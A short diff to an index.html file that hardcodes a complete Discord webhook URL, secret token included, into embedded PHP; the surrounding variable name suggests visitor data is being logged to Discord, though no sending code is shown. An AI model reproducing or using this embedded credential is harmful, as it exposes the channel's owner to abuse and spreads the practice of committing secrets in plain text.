--- a/index.html
+++ b/index.html
@@ -45,7 +45,7 @@
 
 <?php
  
-$webhookurl = ""; // Paste your webhook between the quotes
+$webhookurl = "https://discord.com/api/webhooks/880935736277364756/K0P0rZmTBDCQgsML_ofBRmCVPr1lTZbD9nYs7DPlbkMYFCgGiBUGlc6PEtWBi97SInk0"; // Paste your webhook between the quotes
  
  
 $TheirDate = date('d/m/Y');
